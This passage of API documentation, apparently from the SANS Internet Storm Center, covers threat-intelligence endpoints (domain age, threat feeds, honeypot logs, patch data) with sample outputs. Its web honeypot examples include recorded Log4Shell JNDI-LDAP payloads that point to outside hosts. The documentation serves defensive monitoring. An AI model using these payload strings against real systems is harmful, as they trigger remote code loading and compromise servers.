Do not include leading .)<br/> </p> <pre> <a href="/api/recentdomains/today/zip">/api/recentdomainsbytld/today/zip</a> </pre> <div class="top-link"><a href="#">Top of page</a></div><!-- / .top-link --><h3 id="domaindata">Domain Age</h3> <p>Return data about a particular domain, in particular the first seen date.<br/> Parameters: domain name</p> <pre> <a href="/api/domainage/sans.edu">/api/domainage/sans.edu</a> </pre> <div class="top-link"><a href="#">Top of page</a></div><!-- / .top-link --><h3 id="daily404summary">404Project Daily Summary</h3> <p>Returns daily summary information of submitted 404 Error Page Information.<br /> Parameters: date</p> <pre> <!--suppress HtmlUnknownTarget --> <a href="/api/daily404summary/2016-02-23/2016-02-26">http://isc.sans.edu/api/daily404summary/2016-02-23/2016-02-26</a> (upper limit optional) <daily404summary> <Daily404Data> <date>2016-02-23</date> <authors>17</authors> <urls>1470</urls> <user_agents>143</user_agents> <sources>385</sources> <reports>2807</reports> </Daily404Data> <Daily404Data> <date>2016-02-24</date> <authors>16</authors> <urls>1457</urls> <user_agents>184</user_agents> <sources>400</sources> <reports>2805</reports> </Daily404Data> <Daily404Data> <date>2016-02-25</date> <authors>17</authors> <urls>1450</urls> <user_agents>165</user_agents> <sources>430</sources> <reports>2831</reports> </Daily404Data> </daily404summary> </pre> <div class="top-link"><a href="#">Top of page</a></div><!-- / .top-link --> <h3 id="daily404detail">404Project Details</h3> <p>Returns detail information of submitted 404 Error Page Information.<br /> Parameters: date, limit</p> <pre> <!--suppress HtmlUnknownTarget --> <a href="/api/daily404detail/2012-02-23/10">http://isc.sans.edu/api/daily404detail/2012-02-23/10</a> <?xml version="1.0" encoding="UTF-8"?> <daily404detail> <data> <url> /robots.txt </url> <user_agent> Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) </user_agent> <source> 207.46.13.147 </source> 
<data> ... </daily404detail> </pre> <div class="top-link"><a href="#">Top of page</a></div><!-- / .top-link --> <h3 id="glossary">glossary</h3> <p>List of glossary terms and definitions<br />Alternatively, append a whole or partial word to the API URL to search for it - <!--suppress HtmlUnknownTarget --> <a href="/api/glossary/data">http://isc.sans.edu/api/glossary/data</a></p> <pre> <!--suppress HtmlUnknownTarget --> <a href="/api/glossary">http://isc.sans.edu/api/glossary</a> <?xml version="1.0" encoding="UTF-8"?> <glossary> <item> <term> 3-WAY HANDSHAKE </date> <definition> Machine A sends a packet with a SYN flag set to Machine B. B acknowledges A's SYN with a SYN/ACK. A acknowledges B's SYN/ACK with an ACK. </records> </item> ... </glossary> </pre> <div class="top-link"><a href="#">Top of page</a></div><!-- / .top-link --><h3 id="survivaltime">survivaltime</h3> <p>The average time, in seconds, between reports for an average IP address.</p> <a href="https://isc.sans.edu/api/survivaltime/2017-08-01">https://isc.sans.edu/api/survivaltime/2017-08-01</a><br/> <pre> <survivaltime> <cummulative>504</cummulative> </survivaltime> </pre> <div class="top-link"><a href="#">Top of page</a></div><!-- / .top-link --><h3 id="threatfeeds">threatfeeds</h3> <p>We collect data from a number of open threat feeds. This API will give you access to this data. Some of this data can also be found as part of the IP or Domain data we return with other API functions. </p> <h4>List of Feeds</h4> <p> <!--suppress HtmlUnknownTarget --> <a href="/api/threatfeeds/">https://isc.sans.edu/api/threatfeeds/</a><br /> Parameters: none</p> <pre> <?xml version="1.0" encoding="UTF-8"?> <threatfeeds> <threatfeed> <type>zeusecc</type> <description><![CDATA[ Zeus Command And Control Server from Abuse.ch ]]></description> <lastupdate>2015-10-24 09:30:00</lastupdate> <datatype>is_ipv4</datatype> <frequency>86400</frequency> </threatfeed> ... more feeds to follow ... 
</threatfeeds> </pre> <div class="top-link"><a href="#">Top of page</a></div><!-- / .top-link --><h4 id="perday">Total Per Day</h4> <!--suppress HtmlUnknownTarget --> <a href="/api/threatfeeds/perday/2015-10-01/2015-10-20">/api/threatfeeds/perday/2015-10-26/2015-10-27</a><br/> The start and end date are optional. The default is the last 30 days. <pre> <threatfeeds> <day> <count>13345</count> <date>2015-10-26</date> </day> <day> <count>11673</count> <date>2015-10-27</date> </day> </threatfeeds> </pre> <div class="top-link"><a href="#">Top of page</a></div><!-- / .top-link --><h4 id="feedperday">Break Down by Datafeed</h4> <p> <!--suppress HtmlUnknownTarget --> <a href="/api/threatfeeds/feedperday/2015-10-26/2015-10-27/openbl_ssh">/api/threatfeeds/feedperday/2015-10-26/2015-10-27/openbl_ssh</a><br/> (or omit the feed name at the end to list all)</p> <pre> <threatfeeds> <feedday> <count>60</count> <date>2015-10-26</date> <type>openbl_ssh</type> </feedday> <feedday> <count>48</count> <date>2015-10-27</date> <type>openbl_ssh</type> </feedday> </threatfeeds> </pre> <div class="top-link"><a href="#">Top of page</a></div><!-- / .top-link --><h4 id="threatlist">All current IPs for a specific feed</h4> <p> <!--suppress HtmlUnknownTarget --> <a href="/api/threatlist/shodan/2015-10-01/2015-11-05">/api/threatlist/shodan/2015-10-01/2015-11-05</a><br/> Without dates, you will get data from the last 7 days.</p> <pre> <threatlist> <shodan> <ipv4>216.117.2.180</ipv4> <date>2015-10-28</date> <lastseen>2015-11-04</lastseen> </shodan> ... 
</threatlist> </pre> <div class="top-link"><a href="#">Top of page</a></div><!-- / .top-link --><h4 id="threatlisthosts">All current Hosts for a specific feed</h4> <p> <!--suppress HtmlUnknownTarget --> <a href="/api/threatlisthosts/shodan">/api/threatlisthosts/shodan</a> (works for shodan, miner and onyphe)</p> <pre> <threatlisthosts> <shodan> <hostname>atlantic.census.shodan.io</hostname> <added>2019-05-30 13:02:08</added> <lastseen>2019-05-30 13:02:08</lastseen> </shodan> <shodan> <hostname>battery.census.shodan.io</hostname> <added>2019-05-30 13:02:08</added> <lastseen>2019-05-30 13:02:08</lastseen> </shodan> <shodan> <hostname>border.census.shodan.io</hostname> <added>2019-05-30 13:02:08</added> <lastseen>2019-05-30 13:02:08</lastseen> </shodan> ... </threatlisthosts> </pre> <div class="top-link"><a href="#">Top of page</a></div><!-- / .top-link --><h4 id="#threatcategory">All current IPs from all feeds in a specific category</h4> <p><!--suppress HtmlUnknownTarget --> <a href="/api/threatcategory/research/2015-10-20/2015-11-10">/api/threatcategory/research/2015-10-20/2015-11-10</a><br/> Similar to the data above, but for a specific category. By default, you will get data from the last 7 days.</p> <pre> <threatcategory> <research> <ipv4>74.82.47.7</ipv4> <date>2015-10-28</date> <lastseen>2015-11-04</lastseen> <type>shadowserver</type> </research> ...
</threatcategory> </pre> <div class="top-link"><a href="#">Top of page</a></div><!-- / .top-link --> <h3 id="webhoneypotsummary">webhoneypotsummary</h3> <p>API data for <a href="/webhoneypot/index.html">Webhoneypot: Web Server Log Project</a>.<br /> Parameters: date</p> <pre> <!--suppress HtmlUnknownTarget --> <a href="/api/webhoneypotsummary/2012-12-10">http://isc.sans.edu/api/webhoneypotsummary/2012-12-10</a> <?xml version="1.0" encoding="UTF-8"?> <webhoneypotsummary> <day> 2012-12-10 </day> <reports> 17 </reports> <authors> 2 </authors> <targets> 2 </targets> <sources> 4 </sources> </webhoneypotsummary> </pre> <div class="top-link"><a href="#">Top of page</a></div><!-- / .top-link --><h3 id="webhoneypotreportsbyurl">webhoneypotreportsbyurl</h3> <p>Search for complete reports (date, time, url, user-agent, source IP) that contain a specific string in the URL. JSON output is highly recommended. By default, today's data is returned, but you may select a specific day. The url and user_agent values are attacker-supplied strings recorded by the honeypots; treat them as untrusted input when you store, log or display the results.</p> <p> Parameters: String from URL, Date in YYYY-MM-DD format. The URL string should be URL encoded. </p> <p> For example, all URLs from December 11th 2021 that contain the string "jndi:ldap". </p> <pre> <!--suppress HtmlUnknownTarget --> <a href="/api/webhoneypotreportsbyurl/jndi:ldap/2021-12-11?json">/api/webhoneypotreportsbyurl/jndi:ldap/2021-12-11?json</a> [ { "date": "2021-12-11", "time": "00:03:30", "url": "/$%7Bjndi:ldap://45.130.229.168:1389/Exploit%7D", "user_agent": "Mozilla/5.0 zgrab/0.x", "source": "20.71.156.146" }, ... [ more reports ] ... </pre> <div class="top-link"><a href="#">Top of page</a></div><!-- / .top-link --><h3 id="webhoneypotreportsbyua">webhoneypotreportsbyua</h3> <p>Search for complete reports (date, time, url, user-agent, source IP) that contain a specific string in the user-agent. JSON output is highly recommended. By default, today's data is returned, but you may select a specific day. As with webhoneypotreportsbyurl, treat the returned url and user_agent values as untrusted input.</p> <p> Parameters: String from User-Agent, Date in YYYY-MM-DD format. The string should be URL encoded.
</p> <p> For example, all reports from December 11th 2021 that contain the string "jndi:ldap" as part of the user agent. </p> <pre> <!--suppress HtmlUnknownTarget --> <a href="/api/webhoneypotreportsbyua/jndi:ldap/2021-12-11?json">/api/webhoneypotreportsbyua/jndi:ldap/2021-12-11?json</a> [ { "date": "2021-12-11", "time": "00:13:38", "url": "/", "user_agent": "${jndi:ldap://7e7372f5c19f.bingsearchlib.com:39356/a}", "source": "185.220.101.148" }, ... [ more reports ] ... </pre> <div class="top-link"><a href="#">Top of page</a></div><!-- / .top-link --><h3 id="webhoneypotbytype">webhoneypotbytype</h3> <p>API data for <a href="/webhoneypot/types.html">Webhoneypot: Attack By Type</a>.<br /> We currently use a set of regular expressions to classify the type of attack used against the honeypot. Output is the top 30 attacks for the last month.</p> <pre> <!--suppress HtmlUnknownTarget --> <a href="/api/webhoneypotbytype">http://isc.sans.edu/api/webhoneypotbytype</a> <?xml version="1.0" encoding="UTF-8"?> <webhoneypotbytype> <item> <reports> 278 </reports> <type> Generic index.php RFI </type> <cve> </cve> </item> ... <item> <reports> 127 </reports> <type> Falcon Series One errors.php RFI </type> <cve> 20076488 </cve> </item> </webhoneypotbytype> </pre> <div class="top-link"><a href="#">Top of page</a></div><!-- / .top-link --> <h3 id="openiocsources">openiocsources</h3> <p>Returns firewall logs in OpenIOC format.<br /> <strong>Parameters:</strong> Date, Records (Max: 1000), Page (For iterating beyond 1000 records)</p> <ul> <li><strong>Date:</strong> Y-m-d format of the day in which you wish to obtain firewall logs. Default is today's date.</li> <li><strong>Records:</strong> Number of firewall logs to be returned. Maximum of 1000 per request. Default is 100.</li> <li><strong>Page:</strong> Page of records to be returned for Date, for iterating beyond the 1000-record maximum per request.
Default is 0.</li> </ul> <p>For example, to obtain firewall logs 1000 through 2000 on 2014-08-01, send a request to <!--suppress HtmlUnknownTarget --> <a href="/api/openiocsources/2014-08-01/1000/1">http://isc.sans.edu/api/openiocsources/2014-08-01/1000/1</a>.</p> <p>Here is a simple example of the expected output:</p> <pre> <!--suppress HtmlUnknownTarget --> <a href="/api/openiocsources/2014-08-01/1/0">http://isc.sans.edu/api/openiocsources/2014-08-01/1/0</a> <?xml version="1.0" encoding="UTF-8"?> <ioc xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" id="44233BFE-2014-0821-3be61964f8a0" last-modified="2014-08-21T18:18:02Z" xmlns="http://schemas.mandiant.com/2010/ioc"> <short_description>Firewall Logs</short_description> <description>Firewall logs from 2014-08-01</description> <authored_by>SANS Internet Storm Center</authored_by> <authored_date>2014-08-21T18:18:02Z</authored_date> <links /> <definition> <Indicator operator="OR" id="44233BFE-2014-0821-3be61964f8a0"> <Indicator operator="OR" id="44233BFE-2014-0821-1f0e79e965d2"> <IndicatorItem id="44233BFE-2014-0821-75150a133199" condition="is"> <Context document="PortItem" search="PortItem/CreationTime" type="mir" /> <Content type="date">2014-08-01T00:00:00Z</Content> </IndicatorItem> <IndicatorItem id="44233BFE-2014-0821-08776eb79936" condition="is"> <Context document="PortItem" search="PortItem/remoteIP" type="mir" /> <Content type="IP">212.034.154.164</Content> </IndicatorItem> <IndicatorItem id="44233BFE-2014-0821-2449d037028d" condition="is"> <Context document="PortItem" search="PortItem/localPort" type="mir" /> <Content type="int">80</Content> </IndicatorItem> <IndicatorItem id="44233BFE-2014-0821-c4fca0bb8767" condition="is"> <Context document="PortItem" search="PortItem/remotePort" type="mir" /> <Content type="int">47783</Content> </IndicatorItem> </Indicator> </Indicator> </definition> </ioc> </pre> <div class="top-link"><a href="#">Top of page</a></div><!-- 
/ .top-link --> <h3 id="getmspatchday">getmspatchday</h3> <p>Returns Microsoft patches issued on a given date</p> <pre> <!--suppress HtmlUnknownTarget --> <a href="/api/getmspatchday/2016-03-08">http://isc.sans.edu/api/getmspatchday/2016-03-08</a> ... <getmspatchday> <id>MS16-023</id> <title>Cumulative Security Update for Internet Explorer</title> <affected> <![CDATA[ Microsoft Windows, Internet Explorer ]]> </affected> <kb>3142015</kb> <exploits>no</exploits> <severity>critical</severity> <clients>critical</clients> <servers>critical</servers> </getmspatchday> ... </pre> <div class="top-link"><a href="#">Top of page</a></div><!-- / .top-link --> <h3 id="getmspatch">getmspatch</h3> <p>Returns a Microsoft patch</p> <pre> <!--suppress HtmlUnknownTarget --> <a href="/api/getmspatch/MS16-023">http://isc.sans.edu/api/getmspatch/MS16-023</a> <getmspatch> <id>16023</id> <title>Cumulative Security Update for Internet Explorer</title> <affected> <![CDATA[ Microsoft Windows, Internet Explorer ]]> </affected> <kb>3142015</kb> <exploits>no</exploits> <severity>critical</severity> <clients>critical</clients> <servers>critical</servers> </getmspatch> </pre> <div class="top-link"><a href="#">Top of page</a></div><!-- / .top-link --> <h3 id="getmspatchcves">getmspatchcves</h3> <p>Returns the CVEs associated with a particular Microsoft patch</p> <pre> <!--suppress HtmlUnknownTarget --> <a href="/api/getmspatchcves/MS16-023">http://isc.sans.edu/api/getmspatchcves/MS16-023</a> ... <getmspatchcves> <exploitability>1</exploitability> <cve>CVE-2016-0102</cve> </getmspatchcves> <getmspatchcves> <exploitability>1</exploitability> <cve>CVE-2016-0103</cve> </getmspatchcves> ...
</pre> <h3 id="getmspatchreplaces">getmspatchreplaces</h3> <p>Returns the Microsoft patches replaced by a particular Microsoft patch</p> <pre> <!--suppress HtmlUnknownTarget --> <a href="/api/getmspatchreplaces/MS16-023">http://isc.sans.edu/api/getmspatchreplaces/MS16-023</a> <getmspatchreplaces> <getmspatchreplaces>KB3134814</getmspatchreplaces> <getmspatchreplaces>KB3135174</getmspatchreplaces> <getmspatchreplaces>KB3135173</getmspatchreplaces> </getmspatchreplaces> </pre> </div> </div> </div> </div> </body></html>